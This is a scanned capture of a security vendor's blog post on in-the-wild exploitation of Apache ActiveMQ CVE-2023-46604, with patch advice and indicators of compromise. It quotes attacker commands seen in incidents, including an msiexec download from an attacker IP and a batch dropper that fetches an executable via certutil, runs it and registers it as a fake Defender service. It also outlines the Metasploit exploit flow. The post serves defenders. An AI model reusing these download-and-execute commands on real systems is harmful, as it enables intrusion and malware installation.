www.huntress.com
Open in
urlscan Pro
2606:2c40::c73c:67e4
Public Scan
URL:
https://www.huntress.com/blog/critical-vulnerability-exploitation-of-apache-activemq-cve-2023-46604
Submission: On November 06 via api from IN — Scanned from DE
Submission: On November 06 via api from IN — Scanned from DE
Form analysis 4 forms found in the DOM
/hs-search-results
<form action="/hs-search-results" data-hs-cf-bound="true">
<div class="pwr--relative">
<input type="text" id="pwr-js-burger-search__input" class="pwr-burger-search__input hs-search-field__input" name="term" autocomplete="off" aria-label="Search" placeholder="Type search here">
<button class="pwr-search-field__icon" type="submit"><span id="hs_cos_wrapper_module_167327601750737_" class="hs_cos_wrapper hs_cos_wrapper_widget hs_cos_wrapper_type_icon" style="" data-hs-cos-general-type="widget" data-hs-cos-type="icon"><svg
version="1.0" xmlns="http://www.w3.org/2000/svg" viewBox="0 0 512 512" aria-hidden="true">
<g id="search2_layer">
<path
d="M505 442.7L405.3 343c-4.5-4.5-10.6-7-17-7H372c27.6-35.3 44-79.7 44-128C416 93.1 322.9 0 208 0S0 93.1 0 208s93.1 208 208 208c48.3 0 92.7-16.4 128-44v16.3c0 6.4 2.5 12.5 7 17l99.7 99.7c9.4 9.4 24.6 9.4 33.9 0l28.3-28.3c9.4-9.4 9.4-24.6.1-34zM208 336c-70.7 0-128-57.2-128-128 0-70.7 57.2-128 128-128 70.7 0 128 57.2 128 128 0 70.7-57.2 128-128 128z">
</path>
</g>
</svg></span></button>
</div>
</form>/hs-search-results
<form action="/hs-search-results" data-hs-cf-bound="true">
<input type="text" id="pwr-js-burger-search__input" class="" name="term" autocomplete="off" aria-label="Search" placeholder="Search">
</form>/hs-search-results
<form action="/hs-search-results" data-hs-cf-bound="true">
<div class="pwr--relative">
<input type="text" id="pwr-header-search__input" class="pwr-header-search__input hs-search-field__input" name="term" autocomplete="off" aria-label="Search" placeholder="Type search here. Hit enter to submit or escape to close.">
<button class="pwr-search-field__icon" type="submit"><span id="hs_cos_wrapper_module_167327601750737_" class="hs_cos_wrapper hs_cos_wrapper_widget hs_cos_wrapper_type_icon" style="" data-hs-cos-general-type="widget" data-hs-cos-type="icon"><svg
version="1.0" xmlns="http://www.w3.org/2000/svg" viewBox="0 0 512 512" aria-hidden="true">
<g id="search3_layer">
<path
d="M505 442.7L405.3 343c-4.5-4.5-10.6-7-17-7H372c27.6-35.3 44-79.7 44-128C416 93.1 322.9 0 208 0S0 93.1 0 208s93.1 208 208 208c48.3 0 92.7-16.4 128-44v16.3c0 6.4 2.5 12.5 7 17l99.7 99.7c9.4 9.4 24.6 9.4 33.9 0l28.3-28.3c9.4-9.4 9.4-24.6.1-34zM208 336c-70.7 0-128-57.2-128-128 0-70.7 57.2-128 128-128 70.7 0 128 57.2 128 128 0 70.7-57.2 128-128 128z">
</path>
</g>
</svg></span></button>
<a href="#" id="pwr-js-header-search__close" class="pwr-header-search__close">
<span class="pwr-header-search__close-icon"></span>
</a>
</div>
</form>POST https://forms.hsforms.com/submissions/v3/public/submit/formsnext/multipart/3911692/196be66c-f1bb-4156-af05-2952954526cd
<form id="hsForm_196be66c-f1bb-4156-af05-2952954526cd_9907" method="POST" accept-charset="UTF-8" enctype="multipart/form-data" novalidate=""
action="https://forms.hsforms.com/submissions/v3/public/submit/formsnext/multipart/3911692/196be66c-f1bb-4156-af05-2952954526cd"
class="hs-form-private hsForm_196be66c-f1bb-4156-af05-2952954526cd hs-form-196be66c-f1bb-4156-af05-2952954526cd hs-form-196be66c-f1bb-4156-af05-2952954526cd_2f04a7b1-5be1-4357-ae2b-2128dcc607b9 hs-form stacked hs-custom-form"
target="target_iframe_196be66c-f1bb-4156-af05-2952954526cd_9907" data-instance-id="2f04a7b1-5be1-4357-ae2b-2128dcc607b9" data-form-id="196be66c-f1bb-4156-af05-2952954526cd" data-portal-id="3911692" data-hs-cf-bound="true">
<div class="hs_email hs-email hs-fieldtype-text field hs-form-field"><label id="label-email-196be66c-f1bb-4156-af05-2952954526cd_9907" class="" placeholder="Enter your Work Email (required)"
for="email-196be66c-f1bb-4156-af05-2952954526cd_9907"><span>Work Email (required)</span><span class="hs-form-required">*</span></label>
<legend class="hs-field-desc" style="display: none;"></legend>
<div class="input"><input id="email-196be66c-f1bb-4156-af05-2952954526cd_9907" name="email" required="" placeholder="" type="email" class="hs-input" inputmode="email" autocomplete="email" value=""></div>
</div>
<div class="hs_submit hs-submit">
<div class="hs-field-desc" style="display: none;"></div>
<div class="actions"><input type="submit" class="hs-button primary large" value="Subscribe"></div>
</div><input name="hs_context" type="hidden"
value="{"embedAtTimestamp":"1699256936328","formDefinitionUpdatedAt":"1697650100341","lang":"en","embedType":"REGULAR","clonedFromForm":"6da6c019-9d2a-47d7-8966-09563d0875cf","userAgent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.6045.105 Safari/537.36","pageTitle":"Critical Vulnerability: Exploitation of Apache ActiveMQ CVE-2023-46604","pageUrl":"https://www.huntress.com/blog/critical-vulnerability-exploitation-of-apache-activemq-cve-2023-46604","pageId":"143686222755","isHubSpotCmsGeneratedPage":true,"canonicalUrl":"https://www.huntress.com/blog/critical-vulnerability-exploitation-of-apache-activemq-cve-2023-46604","contentType":"blog-post","hutk":"0c25cce96d395e6e1d348caed54fa61b","__hsfp":1305947141,"__hssc":"1139630.1.1699256938043","__hstc":"1139630.0c25cce96d395e6e1d348caed54fa61b.1699256938043.1699256938043.1699256938043.1","formTarget":"#hs_form_target_module_155266670085300_subscribe","formInstanceId":"9907","pageName":"Critical Vulnerability: Exploitation of Apache ActiveMQ CVE-2023-46604","rumScriptExecuteTime":1057,"rumTotalRequestTime":1282.7000045776367,"rumTotalRenderTime":1300.8000030517578,"rumServiceResponseTime":225.70000457763672,"rumFormRenderTime":18.099998474121094,"locale":"en","timestamp":1699256938052,"originalEmbedContext":{"portalId":"3911692","formId":"196be66c-f1bb-4156-af05-2952954526cd","region":"na1","target":"#hs_form_target_module_155266670085300_subscribe","isBuilder":false,"isTestPage":false,"isPreview":false,"formInstanceId":"9907","formsBaseUrl":"/_hcms/forms","css":"","isMobileResponsive":true,"pageName":"Critical Vulnerability: Exploitation of Apache ActiveMQ CVE-2023-46604","pageId":"143686222755","contentType":"blog-post","formData":{"cssClass":"hs-form stacked hs-custom-form"},"isCMSModuleEmbed":true},"correlationId":"2f04a7b1-5be1-4357-ae2b-2128dcc607b9","renderedFieldsIds":["email"],"captchaStatus":"NOT_APPLICABLE","emailResubscribeStatus":"NOT_APPLICABLE","isInsideCrossOriginFrame":false,"source":"forms-embed-1.4082","sourceName":"forms-embed","sourceVersion":"1.4082","sourceVersionMajor":"1","sourceVersionMinor":"4082","allPageIds":{"embedContextPageId":"143686222755","analyticsPageId":"143686222755","contentPageId":143686222755,"contentAnalyticsPageId":"143686222755"},"_debug_embedLogLines":[{"clientTimestamp":1699256936416,"level":"INFO","message":"Retrieved customer callbacks used on embed context: [\"getExtraMetaDataBeforeSubmit\"]"},{"clientTimestamp":1699256936417,"level":"INFO","message":"Retrieved pageContext values which may be overriden by the embed context: {\"pageTitle\":\"Critical Vulnerability: Exploitation of Apache ActiveMQ CVE-2023-46604\",\"pageUrl\":\"https://www.huntress.com/blog/critical-vulnerability-exploitation-of-apache-activemq-cve-2023-46604\",\"userAgent\":\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.6045.105 Safari/537.36\",\"pageId\":\"143686222755\",\"contentAnalyticsPageId\":\"143686222755\",\"contentPageId\":143686222755,\"isHubSpotCmsGeneratedPage\":true}"},{"clientTimestamp":1699256936419,"level":"INFO","message":"Retrieved countryCode property from normalized embed definition response: \"DE\""},{"clientTimestamp":1699256938048,"level":"INFO","message":"Retrieved analytics values from API response which may be overriden by the embed context: {\"hutk\":\"0c25cce96d395e6e1d348caed54fa61b\",\"canonicalUrl\":\"https://www.huntress.com/blog/critical-vulnerability-exploitation-of-apache-activemq-cve-2023-46604\",\"contentType\":\"blog-post\",\"pageId\":\"143686222755\"}"}]}"><iframe
name="target_iframe_196be66c-f1bb-4156-af05-2952954526cd_9907" style="display: none;"></iframe>
</form>Text Content
This website uses cookies to improve your viewing experience. To find out more
about the cookies we use, see our Privacy Policy.
Accept Decline
Skip to content
Close
* Platform
* Platform Overview Cybersecurity for the 99%
* Managed EDR Stop Attacks with Process Insights
* SOC 24/7 Human Threat Hunting
* Persistent Footholds Find Attackers Hiding in Plain Sight
* Managed Antivirus Strengthen Frontline Protection
* MDR for Microsoft 365 Microsoft 365 Threat Detection
* Ransomware Canaries Detect Ransomware Faster
* External Recon Scan Ports & Potential Exposures
* Security Awareness Training Sharpen Your Employees' Defenses
* Partner Enablement Grow Your Cybersecurity Practice
See The Huntress Managed Security Platform in Action
Ask questions, explore the dashboard and more
Book a demo >
* Who We Serve
* Managed Service Providers Empowering MSPs to Secure End Customers
* Value Added Resellers A Complete ready-to-sell platform for VARs
* Businesses & IT Teams Empowering IT to Bridge the Cyber Gap
* Resources
* Cybersecurity Education Webinars, eBooks and More
* Upcoming Events Tradeshows and Live Industry Events
* Tradecraft Tuesday No Product. No Pitches. Just Tradecraft.
* Success Stories Case Studies & Testimonials
* Community Fireside Chat Check out the latest Fireside Chats
* Blog
* Company
* Leadership Team Meet the Team Taking the Fight to Hackers
* Press Media Coverage, Interviews & More
* Careers Join the Hunt - We're Hiring!
* Contact Us Talk to Sales, Get Help or Say Hello :)
* Partners
* Partner Login Access Your Huntress Dashboard
* Support Documentation Technical Product Support, FAQs & More
SEARCH
Free Trial
* Platform
* Platform Overview Cybersecurity for the 99%
* Managed EDR Stop Attacks with Process Insights
* SOC 24/7 Human Threat Hunting
* Persistent Footholds Find Attackers Hiding in Plain Sight
* Managed Antivirus Strengthen Frontline Protection
* MDR for Microsoft 365 Microsoft 365 Threat Detection
* Ransomware Canaries Detect Ransomware Faster
* External Recon Scan Ports & Potential Exposures
* Security Awareness Training Sharpen Your Employees' Defenses
* Partner Enablement Grow Your Cybersecurity Practice
See The Huntress Managed Security Platform in Action
Ask questions, explore the dashboard and more
Book a demo >
* Who We Serve
* Managed Service Providers Empowering MSPs to Secure End Customers
* Value Added Resellers A Complete ready-to-sell platform for VARs
* Businesses & IT Teams Empowering IT to Bridge the Cyber Gap
* Resources
* Cybersecurity Education Webinars, eBooks and More
* Upcoming Events Tradeshows and Live Industry Events
* Tradecraft Tuesday No Product. No Pitches. Just Tradecraft.
* Success Stories Case Studies & Testimonials
* Community Fireside Chat Check out the latest Fireside Chats
* Blog
* Company
* Leadership Team Meet the Team Taking the Fight to Hackers
* Press Media Coverage, Interviews & More
* Careers Join the Hunt - We're Hiring!
* Contact Us Talk to Sales, Get Help or Say Hello :)
* Partners
* Partner Login Access Your Huntress Dashboard
* Support Documentation Technical Product Support, FAQs & More
Free Trial
Team Huntress 11.2.2023 8 min read
CRITICAL VULNERABILITY: EXPLOITATION OF APACHE ACTIVEMQ CVE-2023-46604
Previous Post
Share on Twitter
Share on LinkedIn
Share on Facebook
Share on Reddit
A partner recently deployed Huntress agents on October 30, 2023, after
experiencing a “HelloKitty” ransomware attack on October 27. This ransomware
attack followed closely with what was described by Rapid7 in their blog post on
November 1, titled Suspected Exploitation of Apache ActiveMQ CVE-2023-46604.
WHAT IS CVE-2023-46604?
Rapid7 identified suspected exploitation of Apache ActiveMQ CVE-2023-46604. The
CVE is a remote code execution vulnerability. Huntress has already seen this
vulnerability being exploited in an environment we monitor. It is imperative you
patch your systems immediately.
PATCH IMMEDIATELY
If you are running Apache ActiveMQ, patches are available to address
CVE-2023-46604 for the following versions: 5.15.16, 5.16.7, 5.17.6, and 5.18.3.
To determine the version of ActiveMQ you are running, a command line tool is
available. The version will be listed by running the command activemq
--version.
Patches can be found here:
https://activemq.apache.org/components/classic/download/
If you are unable to patch these systems, you should immediately block the
systems from being accessible from the Internet, which will significantly limit
the attack surface.
HUNTRESS OBSERVATIONS
The Huntress team received a number of signals indicative of remote commands
issued via Apache ActiveMQ. As illustrated in Figure 1, the process lineage
started with wrapper.exe and java.exe, and resulted in a command processor
execution.
Figure 1: Command Process Tree
The Huntress team’s investigation determined that the exploitation of Apache
ActiveMQ was the root cause of this incident.
Analysis of Windows Event Log data extracted from one endpoint indicated
historical (prior to the Huntress agent being installed) signs of a compromise
that aligned with what was observed by Rapid7. Specifically, MsiInstaller events
indicated the start of installation for both http://172.245.16].]125/m4.png and
http://172.245.16[.]125/m2.png. However, neither package appeared to install
successfully. One of the packages failed to install due to an error with
C:\Windows\Installer\MSIB9E7.tmp, and the other completed, but
C:\Windows\Installer\MSIBC6B.tmp was detected and quarantined by Windows
Defender.
Both *.png files were, in fact, MSI installer files packaged using the
exe2msiSetupPackage, from QwertyLab, as illustrated in Figure 2.
Figure 2: MsiInstaller event ID 1033 event record message (Application Event
Log)
Following this activity, the Huntress team observed the process tree illustrated
in Figure 1, as well as in Figure 3, on multiple endpoints.
Figure 3: RuntimeBroker.msi Process Tree
The process tree, with full file paths, for RuntimeBroker.msi, illustrated in
Figure 3, appears as follows:
C:\MRX\Apache\ActiveMQ\bin\win64\wrapper.exe -> C:\Program Files (x86)\Common
Files\Oracle\Java\javapath\java.exe -> “cmd.exe /c msiexec /q /i
http://4.216.93[.]211:5981/RuntimeBroker.msi”
The command to download and install the RuntimeBroker.msi file via MSIExec does
not appear to have succeeded on either endpoint, as there are no MsiInstaller
event records visible in the Application Event Log for that endpoint, during
that time.
Following the unsuccessful attempt to install the RuntimeBroker.msi file, the
command illustrated in Figure 1 was observed on several endpoints. However,
within a short period (a second or less), Windows Defender detected and
quarantined the agent_w.exe file on that same endpoint. Even though agent_w.exe
was quarantined, analysis of the retrieved file indicates that it attempts to
connect to 137.175.17[.]172.
On November 2, the Huntress team was alerted to multiple endpoints executing
curl requests via the URL hxxp://27.102.128[.]152:8098/bit[.]ico, as illustrated
in Figure 4. This activity appeared to spawn from the execution of wrapper.exe
located within a subdirectory of the ActiveMQ installation files, exactly as
observed in previous process trees.
Figure 4: Curl Process Tree
The Huntress team would like to note that activity of this nature was observed
as early as October 10, as illustrated in Figure 5.
Figure 5: Process Creation Event from October 10, 2023
At the time that analysts responded to the alert illustrated in Figure 5, the
system at IP address 45.32.120[.]181 was not accessible, but the win.bat file
was retrieved from alternative sources, and appears as follows:
@echo off
cmd /c certutil -urlcache -split -f http://45.32.120[.]181/x86.exe
c:\users\public\86.dat
cmd /c start /b c:\users\public\86.dat
sc create windowDefenSrv binPath= "c:\users\public\86.dat windowDefenSrv"
start= auto
del c:\users\public\win.bat
At the time that the events were investigated, Huntress analysts found no
additional, subsequent malicious activity on the endpoint, indicating that the
infection process did not succeed. However, the process tree was identical to
what was illustrated in Figures 1 and 3.
THE ATTACK LAB: EXPLOITATION PROOF OF CONCEPT
Exploitation for this attack is trivial. There is a Metasploit module that
automates exploitation for this attack. The Huntress team confirms that this
module works like a charm against vulnerable instances of ActiveMQ.
The exploit process unfolds in two stages:
* The attacker establishes a connection to ActiveMQ via the OpenWire protocol,
typically running on port 61616.
* By sending a crafted OpenWire packet, the attacker prompts the system to
unmarshal a class they control. This action triggers the vulnerable server to
fetch and load a class configuration XML file from a remote URL, implying the
attacker must have a pre-defined XML file hosted elsewhere.
The OpenWire protocol request originates from the attacker, but the request to
load a remote class configuration XML file originates from the victim server.
The original writeup for this vulnerability includes the following example of
the XML file’s schema:
The loaded class calls the ProcessBuilder method to execute notepad.exe. In
practice, the class configuration file will contain any of the well-known
post-exploitation primitives like curl, certutil, powershell, and the like.
In this example, we simply echo “worked” into C:\Windows\Temp\worked.txt to
prove successful exploitation:
Figure 6: Running the Metasploit Module
We then see the new file in the vulnerable server’s C:\Windows\Temp directory,
which proves code execution:
Figure 7: Proof of Execution
We also see the requested class configuration file in the Wireshark HTTP stream
for this example:
Figure 8: Reconstructed Network Traffic via Wireshark
INDICATORS OF COMPROMISE (IOCS)
137.175.17[.]172
172.245.16].]125:80
4.216.93[.]211:5981
27.102.128[.]152:8098
45.32.120[.]181
File Name
Hash
Agent_w.exe
dd13cf13c1fbdc76da63e76adcf36727cfe594e60af0dc823c5a509a13ae1e15
RuntimeBroker.msi
4c9fa87e72fe59cf15131bd2f3bd7baa7a9555ceec438c1df78dd5d5b8394910
SIGMA DETECTOR
The Huntress DE&TH team has also released a public Sigma detector for this
particular threat.
HUNTRESS HAS ADDED DETECTIONS FOR THE ACTIVITY REPORTED IN THIS BLOG. IF YOU’D
LIKE TO HAVE SOMEONE ELSE WATCHING YOUR BACK WHILE YOU WORK ON PATCHING, FEEL
FREE TO START A FREE TRIAL WITH US SO OUR 24/7 SOC CAN KEEP AN EYE OUT FOR YOU.
Special thanks to Josh Allman, Faith Stratton, Matthew Kiely, Matt Anderson,
Sharon Martin, Harlan Carvey, and Joe Slowik for their contributions to this
writeup.
Share on Twitter
Share on LinkedIn
Share on Facebook
Share on Reddit
TEAM HUNTRESS
YOU MAY ALSO LIKE
Team Huntress 10.2.2023 3 min read
CRITICAL VULNERABILITIES: WS_FTP EXPLOITATION
Huntress is actively investigating numerous vulnerabilities affecting the WS_FTP
Server ...
Start Reading
Team Huntress 09.28.2023 5 min read
CRITICAL VULNERABILITY: WEBP HEAP BUFFER OVERFLOW (CVE-2023-4863)
Huntress is tracking a new critical vulnerability seen in the wild that affects
anything ...
Start Reading
Hackers are constantly evolving to better attack small and mid-size
businesses—Huntress is how SMBs and managed service providers stay ahead with
managed cybersecurity solutions for endpoints, email, and identity.
LinkedIn Twitter Facebook YouTube BizRatings
* Platform
* Platform Overview
* For MSPs
* For VARs
* Free Trial
* Resources
* Cybersecurity Education
* Blog
* Events
* Careers
Sign Up for Blog Updates
Work Email (required)*
© 2023 Huntress - All rights reserved
* Terms of Use
* Privacy Policy
* Legal
* Cookie Policy